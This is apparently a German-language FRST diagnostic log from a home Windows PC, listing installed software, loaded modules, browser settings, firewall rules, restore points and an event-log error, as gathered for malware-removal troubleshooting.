Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft Launcher (HKLM-x32\...\{CFF44AE9-2908-4D7D-B48B-1CB5139015C7}) (Version: 1.0.0.0 - Mojang)
Mozilla Firefox 81.0.1 (x64 de) (HKLM\...\Mozilla Firefox 81.0.1 (x64 de)) (Version: 81.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 60.2.1 - Mozilla)
Mozilla Thunderbird 68.12.1 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 68.12.1 (x86 de)) (Version: 68.12.1 - Mozilla)
NVIDIA HD-Audiotreiber 1.3.38.16 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.16 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 23.2.1 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.12527.20988 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.12527.20988 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.12527.20988 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.12527.20988 - Microsoft Corporation) Hidden
Origin (HKLM-x32\...\Origin) (Version: 10.5.73.41506 - Electronic Arts, Inc.)
PDF24 Creator 9.2.1 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: 9.2.1 - PDF24.org)
Pixum Fotowelt (HKLM-x32\...\Pixum Fotowelt) (Version: 6.4.7 - CEWE Stiftung u Co. KGaA)
Skype Version 8.62 (HKLM-x32\...\Skype_is1) (Version: 8.62 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Sweet Home 3D version 6.3 (HKLM\...\Sweet Home 3D_is1) (Version: 6.3 - eTeks)
Teams Machine-Wide Installer (HKLM-x32\...\{39AF0813-FA7B-4860-ADBE-93B9B214B914}) (Version: 1.2.0.34161 - Microsoft Corporation)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.3.2 - TeamSpeak Systems GmbH)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.2.2756 - TeamViewer)
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 2.6.3.0 - Zenimax Online Studios)
Twitch (HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 8.0.0 - Twitch Interactive, Inc.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{16AD6161-2E47-4BF1-AA77-0946EFE93E08}) (Version: 2.61.0.0 - Microsoft Corporation)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.11 - VideoLAN)
YuLinc AppShare Screen Sharing (HKLM-x32\...\{c24e795a-89f0-4ca3-a185-24a140e22413}) (Version: 5.1.4.22070 - netucate systems GmbH)

Packages:
=========
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-10-26] (Microsoft Corporation)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-05] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-05] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x64__8wekyb3d8bbwe [2020-08-20] (Microsoft Studios) [MS Ad]

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2019-10-03] (NVIDIA Corporation -> NVIDIA Corporation)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Drivers32: [vidc.VP60] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
HKLM\...\Drivers32: [vidc.VP61] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)

==================== Verknüpfungen & WMI ========================

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2017-10-13 12:43 - 2017-10-13 12:43 - 004048896 _____ (Digia Plc and/or its subsidiary(-ies)) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\Qt5Core.dll
2017-10-13 12:43 - 2017-10-13 12:43 - 000816640 _____ (Digia Plc and/or its subsidiary(-ies)) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\Qt5Network.dll
2017-10-13 12:43 - 2017-10-13 12:43 - 022317056 _____ (The ICU Project) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\icudt51.dll
2017-10-13 12:43 - 2017-10-13 12:43 - 001767424 _____ (The ICU Project) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\icuin51.dll
2017-10-13 12:43 - 2017-10-13 12:43 - 001295872 _____ (The ICU Project) [Datei ist nicht signiert] C:\Program Files (x86)\netucate\YuLinc AppShare\icuuc51.dll
2019-01-20 16:26 - 2020-03-16 15:05 - 001282048 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\LIBEAY32.dll
2019-01-20 16:26 - 2020-03-16 15:06 - 000279040 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\ssleay32.dll
2019-01-20 16:26 - 2019-07-12 09:23 - 001611264 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2020-06-25 14:18 - 2019-07-12 09:23 - 005487104 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Core.dll
2020-06-25 14:18 - 2019-07-12 09:23 - 005841920 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Gui.dll
2020-06-25 14:18 - 2019-07-12 09:23 - 001179136 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Network.dll
2020-06-25 14:18 - 2019-07-12 09:23 - 000146432 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5WebSockets.dll
2020-06-25 14:18 - 2019-07-12 09:23 - 005089792 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2020-06-25 14:18 - 2019-07-12 09:23 - 000184832 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Xml.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-950702919-2450676760-769127011-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE04
SearchScopes: HKU\S-1-5-21-950702919-2450676760-769127011-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE04
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-07-26] (Microsoft Corporation -> Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\sharepoint.com -> hxxps://combs4nvt-files.sharepoint.com
IE trusted site: HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2018-04-12 01:38 - 2018-04-12 01:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-950702919-2450676760-769127011-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Tamy\Downloads\Bilder\Bilder\Neuer Ordner (3)\0152eb2de96d653836060b2754ef0eb2.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
 ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\StartupApproved\Run: => "OneDrive"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{030D48D8-0797-4E49-B858-E0758C6387E0}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{4A3B0BFE-355B-43E1-A895-A0F45DDEA04E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Suicide of Rachel Foster\TSORF.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{14EE9A49-C174-4031-A7F9-15537AFF764B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Suicide of Rachel Foster\TSORF.exe (Epic Games, Inc.) [Datei ist nicht signiert]
FirewallRules: [{F4EDE0C2-AB33-46AC-8330-4B075006873C}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{965A77BD-43B4-436A-8275-E591F73134FF}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{645BD930-3B27-4C7D-B627-1D6C88061B89}] => (Allow) C:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4_x64.exe (Electronic Arts, Inc. -> Electronic Arts Inc.)
FirewallRules: [{8168AAC9-F50C-48C6-97DE-70988A24B3F3}] => (Allow) C:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin\TS4_x64.exe (Electronic Arts, Inc. -> Electronic Arts Inc.)
FirewallRules: [{F10EA35A-29D0-4152-BB40-924B8409EBEA}] => (Allow) C:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin_LE\TS4.exe (Electronic Arts, Inc. -> Electronic Arts Inc.)
FirewallRules: [{E4056FC9-4713-4553-B868-03B545CDC347}] => (Allow) C:\Program Files (x86)\Origin Games\The Sims 4\Game\Bin_LE\TS4.exe (Electronic Arts, Inc. -> Electronic Arts Inc.)
FirewallRules: [UDP Query User{E23C4AF5-BBFD-4304-9DF2-FACED462503F}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
FirewallRules: [TCP Query User{761E52A8-1100-43BB-8024-22C25A720FB7}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe (Logitech Inc -> Logitech Inc.)
FirewallRules: [{1E24983F-A821-47B1-85EE-6DBF5AA484F4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.SteamLauncher.exe => Keine Datei
FirewallRules: [{B4611A1F-9566-412D-B372-F38DF22C3619}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.SteamLauncher.exe => Keine Datei
FirewallRules: [{225B842E-627D-4FCE-81C3-AE5DE9CC638F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ModManager.exe => Keine Datei
FirewallRules: [{55736684-752F-47A8-934E-F85FB12EC8DA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ModManager.exe => Keine Datei
FirewallRules: [{BB75EDAB-973D-4F9B-A171-5380D523757A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ServerWizard.exe => Keine Datei
FirewallRules: [{891D0F7E-DCE0-4090-A346-ECCDBC5C8814}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ServerWizard.exe => Keine Datei
FirewallRules: [{D507C8A0-3DA7-4B38-9E5D-A4663886F415}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\DPDecoder.exe (Blackmagic Design Pty Ltd -> )
FirewallRules: [{DA2CAECB-6025-4136-901F-0C9C5DFE182B}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\TangentPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{DC548F85-4E0B-4366-9984-2707BC1B6E1C}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\EuphonixPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{850872BA-868F-4D1E-9ACD-25A6ED1CE0A8}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\JLCooperPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{3A2C5ABF-BEE7-462A-89C6-2A3126301305}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\DaVinciPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{814B36DF-C514-46C8-8FE3-B14C5CF227D2}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\bmdpaneld.exe () [Datei ist nicht signiert]
FirewallRules: [{E0B64A32-C70F-482B-8E70-128DA5C23218}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\Resolve.exe (Blackmagic Design Pty Ltd -> Blackmagic Design Pty. Ltd.)
FirewallRules: [{7E81C17B-2276-43EC-BF07-0D765A5CB996}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{0ABF2F82-E31E-411D-8A11-18814F784E85}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{A37732DF-FAB4-420E-A54D-2EAD431FDD00}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{02158A46-93F7-40A9-976F-C7A6B8EB948A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{5F163849-15A9-43DB-B306-96FF8DF36463}C:\program files\blackmagic design\davinci resolve\fuscript.exe] => (Allow) C:\program files\blackmagic design\davinci resolve\fuscript.exe (Blackmagic Design Pty. Ltd.) [Datei ist nicht signiert]
FirewallRules: [TCP Query User{1D7131E5-C7FD-4C56-9C00-6CC51F940CDC}C:\program files\blackmagic design\davinci resolve\fuscript.exe] => (Allow) C:\program files\blackmagic design\davinci resolve\fuscript.exe (Blackmagic Design Pty. Ltd.) [Datei ist nicht signiert]
FirewallRules: [{CE3BCED8-74C1-4B54-955D-73C9AB5209FD}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{1B2973C1-460E-4647-8935-E50C08C1B84C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{76BAC813-E520-4799-9E99-B659E4208E1D}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{E73705AA-6EEB-48C5-8AE9-B8557E076728}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{75E54FEE-B187-46B4-8E17-EC8E1E4ED191}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
FirewallRules: [TCP Query User{AEEDAE66-4725-4CA1-B9BB-5D2A76310B36}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
FirewallRules: [{E86E1885-0869-411E-B2B5-15DF8A5C9A8C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TPH\TPH.exe () [Datei ist nicht signiert]
FirewallRules: [{E43CD189-F465-4F84-B02F-DA079B8CBCEC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TPH\TPH.exe () [Datei ist nicht signiert]
FirewallRules: [UDP Query User{927215D3-13D3-4629-94C1-54AF07C173D5}C:\users\tamy\downloads\mirc\mirc\mirc.exe] => (Block) C:\users\tamy\downloads\mirc\mirc\mirc.exe (mIRC Co. Ltd.) [Datei ist nicht signiert]
FirewallRules: [TCP Query User{8D775FFB-10E3-40BF-8461-A238C513FA75}C:\users\tamy\downloads\mirc\mirc\mirc.exe] => (Block) C:\users\tamy\downloads\mirc\mirc\mirc.exe (mIRC Co. Ltd.) [Datei ist nicht signiert]
FirewallRules: [{CF682FC4-667B-412A-B731-549A2781BBA6}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{BBD5A84F-C65F-4F59-B161-BD2A52F65C3E}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{49B6683C-F54A-4540-BA92-94E0E2C847D9}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{27DE3267-189F-48B6-A95F-96853314326D}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{BF9F41BF-D6D8-4B81-8996-0740912FD647}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe (Bethesda Softworks) [Datei ist nicht signiert]
FirewallRules: [{0D346682-FD29-43C0-8EDE-3D7C1D8855ED}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe (Bethesda Softworks) [Datei ist nicht signiert]
FirewallRules: [{10CB5ED3-88E2-491D-B21A-3D946EDB4863}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Sims 3\Game\Bin\Sims3Launcher.exe (Electronic Arts -> Electronic Arts, Inc.)
FirewallRules: [{78A56F30-2B7C-46D3-964B-EB12E1157D66}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Sims 3\Game\Bin\Sims3Launcher.exe (Electronic Arts -> Electronic Arts, Inc.)
FirewallRules: [{39F8BBA7-4338-4C24-99C9-C4CC6317D96C}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{FC885D45-0677-4AFE-B7D3-7ACE2B16727E}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{13102939-BF52-4115-B690-543543567389}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe => Keine Datei
FirewallRules: [{1A2F0519-AACA-4CC2-B35C-932C63FFB4F6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe => Keine Datei
FirewallRules: [{9F661CBA-CF1B-46F0-9014-AB719F458652}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Blackwood Crossing\Blackwood Crossing.exe () [Datei ist nicht signiert]
FirewallRules: [{B95C53EC-CF8A-444A-9827-EB59D1084FA5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Blackwood Crossing\Blackwood Crossing.exe () [Datei ist nicht signiert]
FirewallRules: [{272856DB-6D2F-4A37-A817-A3F84B9DA474}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Client.exe => Keine Datei
FirewallRules: [{1C4F2FCA-6D64-403B-975F-D6E73FAFE751}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Client.exe => Keine Datei
FirewallRules: [{2FE5B42D-0732-49DA-8643-991FFB4FD15C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Client.exe => Keine Datei
FirewallRules: [{F6FF971C-55FD-4544-9308-57A30FC26301}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Client.exe => Keine Datei
FirewallRules: [{64D22DEE-D605-496F-A030-ECB4BC9C1539}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.exe => Keine Datei
FirewallRules: [{A7591A5E-F89C-46D2-9571-09C17B225263}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.exe => Keine Datei
FirewallRules: [{346C8694-BC30-48EE-A684-8EA1B45ADF83}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.exe => Keine Datei
FirewallRules: [{7DDDD07B-1436-49ED-BFC8-467972E1B579}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.exe => Keine Datei
FirewallRules: [{AA837FAF-50E2-43EC-A941-9933848A3974}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.NoConsole.exe => Keine Datei
FirewallRules: [{DD32840C-2770-4734-95AC-034711557422}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.NoConsole.exe => Keine Datei
FirewallRules: [{901461F8-1746-4337-A4ED-6B3DAC239756}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.NoConsole.exe => Keine Datei
FirewallRules: [{AF3D1A11-3C7E-4432-B597-1B026073A2E5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.Server.NoConsole.exe => Keine Datei
FirewallRules: [{5A557F2F-F3F2-430E-B4DE-D022AC6A5E0B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ServerWizard.exe => Keine Datei
FirewallRules: [{AE2409F5-D506-4B85-AC4B-AC6B6DC0CB17}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ServerWizard.exe => Keine Datei
FirewallRules: [{2800AF44-11B3-457B-8947-6AE2DA9EDDF1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ModManager.exe => Keine Datei
FirewallRules: [{7854E954-28BD-468B-858E-8ED359720FF0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.ModManager.exe => Keine Datei
FirewallRules: [{5A85C0F8-7541-4C5E-BEF6-88FEEBF8B916}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.SteamLauncher.exe => Keine Datei
FirewallRules: [{038B2FBE-08E5-4CF1-8288-03BF12FB686A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Staxel\bin\Staxel.SteamLauncher.exe => Keine Datei
FirewallRules: [{6A68D5AA-C920-4CC6-910A-9F7FB75C1123}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Zenimax Online\zosSteamStarter.exe (Zenimax Media Inc. -> Zenimax Online Studios)
FirewallRules: [{8F230B80-A823-482E-9D3B-29AD39378840}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Zenimax Online\zosSteamStarter.exe (Zenimax Media Inc. -> Zenimax Online Studios)
FirewallRules: [{3D2F6897-7F09-4E28-8054-5A1169B255D0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe => Keine Datei
FirewallRules: [{D26B2ED2-399D-412B-BDE4-FEE079F10EB1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe => Keine Datei
FirewallRules: [{777050EB-0A1C-4824-8921-5A549C4B4206}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cities_Skylines\Cities.exe => Keine Datei
FirewallRules: [{1EEAAD22-5CB3-45EC-BAE5-0A5F745914EE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Cities_Skylines\Cities.exe => Keine Datei
FirewallRules: [{167C91D0-194A-44F4-B63A-D07DC4CF56D9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Morrowind\Morrowind Launcher.exe (Bethesda Softworks) [Datei ist nicht signiert]
FirewallRules: [{F13FEE40-55CE-4058-A07A-F33EAE1ACE64}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Morrowind\Morrowind Launcher.exe (Bethesda Softworks) [Datei ist nicht signiert]
FirewallRules: [{27FC6B3B-097C-4BC1-992A-EFDD6DC5C2DB}] => (Block) C:\Program Files (x86)\Avira\SoftwareUpdater\avirasoftwareupdatertoastnotificationsbridge.exe => Keine Datei
FirewallRules: [{B30F4C33-ECA1-434C-98F4-997BD09954A4}] => (Allow) C:\Program Files (x86)\Avira\SoftwareUpdater\avirasoftwareupdatertoastnotificationsbridge.exe => Keine Datei
FirewallRules: [{9A965A18-BE4E-488B-BDB2-E98400D0C5F8}] => (Allow) C:\Program Files (x86)\Avira\SoftwareUpdater\avirasoftwareupdatertoastnotificationsbridge.exe => Keine Datei

==================== Wiederherstellungspunkte =========================

23-09-2020 17:13:06 Geplanter Prüfpunkt
02-10-2020 10:46:57 Geplanter Prüfpunkt
03-10-2020 21:43:12 Removed 4K Video Downloader 4.8

==================== Fehlerhafte Geräte im Gerätemanager ============


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (10/04/2020 03:03:52 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x8007045b, Der Computer wird heruntergefahren.
.

